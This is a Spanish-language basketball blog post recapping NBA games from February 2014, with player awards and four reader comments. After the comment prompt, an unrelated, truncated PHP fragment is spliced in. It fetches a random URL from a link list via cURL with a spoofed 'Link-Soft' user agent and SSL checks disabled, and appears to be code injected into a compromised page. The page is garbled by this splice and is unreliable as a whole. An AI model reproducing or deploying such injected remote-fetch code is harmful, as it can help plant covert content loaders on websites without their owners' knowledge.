La Crónica: Otra vez Lebron

19 de February de 2014 por TheDeerHunter

Cuanto más arrecia la dificultad mejor responde el mejor jugador de nuestro tiempo. No cabía otra derrota más.Los Heat estaban perdiendo comba contra los peligrosos Pacers y se enfrentaban a una complicada visita a Dallas, cancha de infausto recuerdo. Tan sólo dos días después, LeBron ya no es el mismo que le cedió el trono a Irving en la pachanga. Ha activado los modos “pelear por MVP” y “soy el dueño del anillo mientras no se demuestre lo contrario”. Partido flojo de Wade pero “The King” se destapó con 42 puntos, 9 rebotes, 6 asistencias y 2 robos (117-106)

En el Oeste vimos otros resultados destacados. Los Suns doblegaron con prórroga incluida a los Nuggets, con una extraordinaria intervención de Gerald Green. Desde el banco los Morris  suelen mantener razonablemente el tipo (112-107). Por su parte, los Grizzlies padecieron lo que no está escrito en casa ante unos Knicks en los que Amare y Tim Hardaway llevaron el peso del partido. Por suerte volvía Conley, con lo cual la situación mejoraba por momentos pero Marc y Zach estuvieron grises. En cambio, Mike Miller y Nick Calathes sacaban muchas  castañas del fuego para volver a acercarse a la pelea (93-98).

En el Este, Al Jefferson destrozaba a los Pistons en Detroit y mandaba un mensaje a una liga que lo infravalora (108-96); los Raptors se impusieron a unos Wizards que estaban todavía de resaca tras el All Star (103-93); los Bucks ganaban por los pelos a Orlando en la lucha por la cuchara de madera (100-104), y los Cavs masacabran a los Sixers (114-85). Si se quiere perdonar expiar pecados Philadelphia es de los mejores sitios posibles.

Además de todo esto hemos visto algunos duelos por todo lo alto. Los Clippers con Reddick lesionado nuevamente y CP3 convaleciente terminaban siendo un jugato roto en manos de los Spurs, con Patt Mills de primera espada (113-103). En cambio, los Pacers ganaban “sobraditos” en  un difícil partido contra Hawks (98-108). 

PREMIOS

MVP: Lebron James de largo con sus 42 puntos (16 de 23), 9 rebotes, 6 asistencias y 2 robos que ya hemos mencionado antes, pero no queremos dejar de mencionar los 32 puntos, 12 rebotes y 7 asistencias de Al Jefferson.

Rookie: Los rookies de los Bucks son las mejores noticias de este curso. Ayer Nate Wolters se quedó cerca del triple-doble con 15 puntos, 7 rebotes y 8 asistencias. Además robó 2 balones y anotó un triple clave en el último minuto. Anthony Bennett aprovechó el plácido partido de los Cavs para conseguir otro doble-doble (10 puntos y 11 rebotes). Tim Hardaway Jr anotó 23 puntos.

Sorpresa: Evan Fournier disputó 33 minutos en los que dejó 25 puntos, 8 rebotes y 4 asistencias. En el mismo partido, Gerald Green se fue hasta los 36 puntos. Tyler Zeller anotó 18 puntos y capturó 15 rebotes en la fácil victoria de los Cavs.

Decepción: Mal partido de Michael Carter-Williams que se va desinflando poco a poco. Acabó con 15 puntos (pero con un 5 de 14) y 7 pérdidas. Rodney Stuckey anotó 2 puntos tras fallar 10 de sus 11 lanzamientos.

Esfuerzo en vano: 35 puntos, 12 rebotes, 4 asistencias, 2 robos… Blake Griffin lo dejó todo sobre la cancha para que su equipo se impusiera a los Spurs pero no encontró la habitual ayuda de sus compañeros.

Imágenes | AP Photos / Getty Images

Comenta

4 comentarios a esta entrada

  1. Esteban dice:
    #1

    por un lado, temporada para enmarcar de Jefferson, hay que tener en cuenta que jugo casi 10 partidos al inicio del año donde venia de una lesión y tenia números bajisimos, y eso le esta pesando para elevar aun mas los actuales, pero su temporada esta siendo de 24 puntos por juego, con un record positivo para su equipo con el en cancha

    otro tema de cierta importancia es Anthony BENNETT, en los ultimos 10 juegos esta promediando 8.7 puntos y 5.4 rebotes, con actuaciones como:

    15 y 8 contra los pelicans
    11 y 1 contra dallas
    14 y 8 contra lakers
    19 y 10 frente a kings
    10 y 11 contra 76ers

    viendo a sus compañeros de promoción, y viendo estos partidos, solo MCW y Burke están por encima de el, seguramente sera el rookie de febrero para el este y de seguir esta tónica hasta el final de la temporada, su crédito estará completamente abierto

      Citar

  2. txusma dice:
    #2

    Tim Hardaway Jr y Oladipo no están por encima de él? Y Olynyk?

      Citar

  3. Ruxixon dice:
    #3

    En los Knicks tienen que estar como una maraca si prefieren a Shumpert antes que a Hardaway.El chaval debe ser la única noticia positiva de toda la temporada por allí.

    Más mérito la actuación de Big Al,enfrente de 3 jugadores como Josh Smith,Drummond y Monroe,aunque probablemente se presuponen mayores aptitudes defensivas de las que realmente han mostrado esta temporada.Mismamente a Drummond le queda mucho para ser un defensor de 1vs1 realmente TOP.Por cierto este no se ha bajado de la rueda del All Star,16-22 para la criatura.A Gores se le avecina una patata caliente en verano con la renovación de Monroe.

    En el Raptors @ Wizards parecía todo vendido en el inicio del último periodo con una ventaja para los canadienses de +20 pero la expulsión de Randy Wittman espoleó a los suyos para intentar la machada y aunque la proyección que llevaban hacía creible la misma,les faltó mayor acierto desde la línea de 3 para acabar de acercarse.El mejor tirador que es Beal no estaba fino y el final creo que ni lo jugó.Los Raptors son mucho más equipo.

      Citar

  4. Esteban dice:
    #4

    Sin lugar a dudas olvide a oladipo, hardaway en menor medida tambien

    Olinyk no ha hecho grandes cosas y con ese fisico, su techo es mas bien bajo en la liga

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>